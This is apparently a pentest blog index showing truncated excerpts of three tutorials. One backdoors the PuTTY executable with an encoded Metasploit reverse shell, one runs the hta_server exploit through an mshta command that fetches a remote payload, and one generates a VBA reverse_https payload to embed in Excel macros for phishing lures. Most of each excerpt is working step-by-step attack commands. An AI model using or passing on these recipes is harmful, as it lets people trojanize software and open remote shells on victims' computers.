
Active Directory Pentest

Recent posts

Backdooring a Legit application using Metasploit

Backdooring an Executable: Creating customized backdoored executables often took attackers a long time to do manually. The ability to embed a Metasploit payload in any executable you want is simply brilliant. When we say any executable, it means any executable. You want to backdoor something you download from the internet? We begin by first downloading our legitimate executable, in this case the popular PuTTY client.

STEP 1: Download PuTTY:
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

STEP 2: Start the Apache server using the following command:
service apache2 start

STEP 3: Create the malicious executable using the following command:
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.15 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe
Note: Replace the IP here with your own IP.

STEP 4: Open msfconsole and type the following commands:
use exploit/multi/handler
set payload windo

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a Windows computer. The exploit was publicly disclosed in late 2016 but was not noticed by the public eye until late 2018. It can be found and used easily by using Metasploit on a Kali Linux distribution.

STEP 1: Check your IP configuration (in this practical I have kept it on Bridge).

STEP 2: Fire up msfconsole in the Kali terminal and search for hta_server. Commands:
service apache2 start
msfconsole
search HTA
use exploit/windows/misc/hta_server

STEP 3: Set all the values in the Metasploit variables. Commands:
set SRVHOST <Your IP>
exploit

STEP 4: Open PowerShell in Windows and execute the following command (in your case a different URL will be generated):
.\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta
As the command gets executed it will open up a session in msfconsole. You can view the session using the following command:
sessions -l
and


MACRO Based Malware (updated)

How macro malware works: Macro malware hides in Microsoft Office files and is delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more. Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware authors need to convince users to turn on macros so that their malware can run. They do this by showing fake warnings when a malicious document is opened.

Prerequisites:
- Metasploit module
- Windows 10
- Microsoft Office

STEP 1: Generate the payload (VBS). Open a terminal in Kali and execute the following command:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.43.138 lport=1234 -f vba

STEP 2: Create a new Excel file and open the Macros setting. Copy and paste the code generated (msfvenom) i